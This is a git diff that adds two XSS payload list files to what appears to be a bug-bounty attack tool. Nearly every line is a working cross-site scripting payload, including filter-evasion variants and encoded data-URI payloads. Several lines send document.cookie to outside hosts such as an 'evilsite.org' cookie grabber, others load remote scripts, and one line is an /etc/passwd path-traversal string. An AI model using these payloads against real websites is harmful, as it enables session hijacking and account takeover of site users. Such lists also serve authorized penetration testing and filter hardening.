@@ -0,0 +1,260 @@ + +'';!--"<XSS>=&{()} +'>//\\,<'>">">"*" +'); alert('XSS +<script>alert(1);</script> +<script>alert('XSS');</script> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<script src=" http://www.evilsite.org/ +cookiegrabber.php "></script> +<script>location.href=" http://www.evilsite.org/ +cookiegrabber.php?cookie= "+escape(docume +nt.cookie)</script> +<scr<script>ipt>alert('XSS');</scr</script>ipt> +<script>alert(String.fromCharCode(88,83,83))</ +script> +<img src=foo.png onerror=alert(/xssed/) /> +<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</ +style> +<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ? +> +<marquee><script>alert('XSS')</script></marquee> +<IMG SRC=\"jav&#x09;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> +<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\"> +<IMG SRC=javascript:alert(String.fromCharCode +(88,83,83))> +"><script>alert(0)</script> +<script src= http://yoursite.com/your_files.js ></ +script> +</title><script>alert(/xss/)</script> +</textarea><script>alert(/xss/)</script> +<IMG LOWSRC=\"javascript:alert('XSS')\"> +<IMG DYNSRC=\"javascript:alert('XSS')\"> +<font style='color:expression(alert(document.cookie +))'> +<img src="javascript:alert('XSS')"> +<script language="JavaScript">alert('XSS')</script> +<body onunload="javascript:alert('XSS');"> +<body onLoad="alert('XSS');" +[color=red' onmouseover="alert('xss')"]mouse over +[/color] +"/></a></><img src=1.gif onerror=alert(1)> +window.alert("Bonjour !"); +<div style="x:expression((window.r==1)?'':eval('r=1; +alert(String.fromCharCode(88,83,83));'))"> +<iframe<?php echo chr(11)?> onload=alert('X +SS')></iframe> +"><script alert(String.fromCharCode(88,83,83))</ +script> +'>><marquee><h1>XSS</h1></marquee> +'">><script>alert('XSS')</script> +'">><marquee><h1>XSS</h1></marquee> +<META HTTP-EQUIV=\"refresh\" 
CONTENT=\"0;url +=javascript:alert('XSS');\"> +<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; +URL=http://;URL=javascript:alert('XSS');\"> +<script>var var = 1; alert(var)</script> +<STYLE type="text/css">BODY{background:url +("javascript:alert('XSS')")}</STYLE> +<?='<SCRIPT>alert("XSS")</SCRIPT>'?> +<IMG SRC='vbscript:msgbox(\"XSS\")'> +" onfocus=alert(document.domain) "> <" +<FRAMESET><FRAME SRC=\"javascript:alert('XSS'); +\"></FRAMESET> +<STYLE>li {list-style-image: url(\"javascript:alert +('XSS')\");}</STYLE><UL><LI>XSS +perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR +\0IPT>\";' > out +perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\" +)>\";' > out +<br size=\"&{alert('XSS')}\"> +<scrscriptipt>alert(1)</scrscriptipt> +</br style=a:expression(alert())> +</script><script>alert(1)</script> +"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert +("XSS")> +[color=red width=expression(alert(123))][color] +<BASE HREF="javascript:alert('XSS');//"> +Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +"></iframe><script>alert(123)</script> +<body onLoad="while(true) alert('XSS');"> +'"></title><script>alert(1111)</script> +</textarea>'"><script>alert(document.cookie)</ +script> +'""><script language="JavaScript"> alert('X \nS +\nS');</script> +</script></script><<<<script><>>>><<<script>alert +(123)</script> +<html><noalert><noscript>(123)</noscript><script> +(123)</script> +<INPUT TYPE="IMAGE" SRC="javascript:alert +('XSS');"> +'></select><script>alert(123)</script> +'>"><script src = ' http://www.site.com/XSS.js '></ +script> +}</style><script>a=eval;b=alert;a(b(/XSS/ +.source));</script> +<SCRIPT>document.write("XSS");</SCRIPT> +a="get";b="URL";c="javascript:";d="alert('xss +');";eval(a+b+c+d); +='><script>alert("xss")</script> +<script+src=">"+src=" http://yoursite.com/xss.js? 
+69,69 "></script> +<body background=javascript:'"><script>alert +(navigator.userAgent)</script>></body> +">/XaDoS/><script>alert(document.cookie)</ +script><script src=" http://www.site.com/XSS.js "></ +script>">/KinG-InFeT.NeT/><script>alert(d +ocument.cookie)</script> +src=" http://www.site.com/XSS.js "></script> +data:text/html;charset=utf-7;base64,Ij48L +3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTM +zNyk8L3NjcmlwdD4= +!--" /><script>alert('xss');</script> +<script>alert("XSS by \nxss")</script><marquee> +<h1>XSS by xss</h1></marquee> +"><script>alert("XSS by \nxss")</script>><marquee +><h1>XSS by xss</h1></marquee> +'"></title><script>alert("XSS by \nxss")</ +script>><marquee><h1>XSS by xss</h1></ +marquee> +<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee> +<script>alert(1337)</script><marquee><h1>XSS by +xss</h1></marquee> +"><script>alert(1337)</script>"><script>alert("XSS +by \nxss</h1></marquee> +'"></title><script>alert(1337)</script>><marquee +><h1>XSS by xss</h1></marquee> +<iframe src="javascript:alert('XSS by \nxss');"></ +iframe><marquee><h1>XSS by xss</h1></marquee> +<iframe src= http://othersite/sb.php > + +%22onmouseover%3d%27alert +%28%22immuniweb%22%29%27%20a%3d +%22%3E +<img src="x:gif" onerror="alert(0)"> +<img src="x:alert" onerror="eval(src '(0)')"> +<img src="x:gif" onerror="eval('al' 'lert(0)')"> +<img src="x:gif" onerror="window['alu0065rt'] +(0)"></img> +";document.write('<img src=http://p42.us/x.png?' +document.cookie '>');" +";document.write('<img sr' 'c=http://p42.us/x.png?' 
+document['cookie'] '>');" +LFI +/foo/../etc/bar/../passwd +'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E +<<scr\0ipt/src=http://xss.com/xss.js></script +%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E +' onmouseover=alert(/XSS/) +"><iframe%20src="http://google.com"%%203E +'<script>window.onload=function(){document.forms[0].message.value='1';}</script> +x”</title><img src%3dx onerror%3dalert(1)> +<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> +<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> +<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> +<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> +<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> +<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> 
+<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> +<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> +<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> +<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> +<script>alert(document.head.innerHTML.substr(146,20));</script> +<script>alert(document.head.childNodes[3].text)</script> +<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> +<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> +<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> 
+<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> +<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> +<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> +<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> +<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> +<script> function b() { 
return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> +<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # +<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # +<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># +<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># +<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 +<script for=document event=onreadystatechange>getElementById('safe123').click()</script> +<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> +<script> location.href = 
'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> +<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { 
alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> +<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> +<script>function x(window) { 
eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E +<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> +<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E +<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b 
name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> +<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> +<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? +<var onmouseover="prompt(1)">On Mouse Over</var>? 
+<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=``<div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? 
+<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script ? +<img src ?itworksonchrome?\/onerror = alert(1)??? +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? 
+<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
+<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
+"><img src=x onerror=prompt(1);>
diff --git a/bounty_drive/attacks/xss/payloads/xss-payload-list-2.txt b/bounty_drive/attacks/xss/payloads/xss-payload-list-2.txt
new file mode 100644
index 0000000..388ca5c
--- /dev/null
+++ b/bounty_drive/attacks/xss/payloads/xss-payload-list-2.txt
@@ -0,0 +1,525 @@ +<script>alert(123);</script> +<ScRipT>alert("XSS");</ScRipT> +<script>alert(123)</script> +<script>alert("hellox worldss");</script> +<script>alert(XSS)</script> +<script>alert(XSS);</script> +<script>alert(XSS)</script> +><script>alert(XSS)</script> +<script>alert(/XSS)</script> +<script>alert(/XSS/)</script> +</script><script>alert(1)</script> +; alert(1); +)alert(1);// +<ScRiPt>alert(1)</sCriPt> +<IMG SRC=jAVasCrIPt:alert(XSS)> +<IMG SRC=javascript:alert(XSS);> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert(XSS)> +<img src=xss onerror=alert(1)> + + +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> + +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' + +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" + +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} + +<img/src=`%00` onerror=this.onerror=confirm(1) + +<form><isindex formaction="javascript&colon;confirm(1)" + +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; + +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> + +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? 
+ +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> + +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ + +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 + +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> + +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> + +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script + +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} + +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> + +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X + +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> + +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a + +http://www.google<script .com>alert(document.location)</script + +<a&#32;href&#61;&#91;&#00;&#93;"&#00; 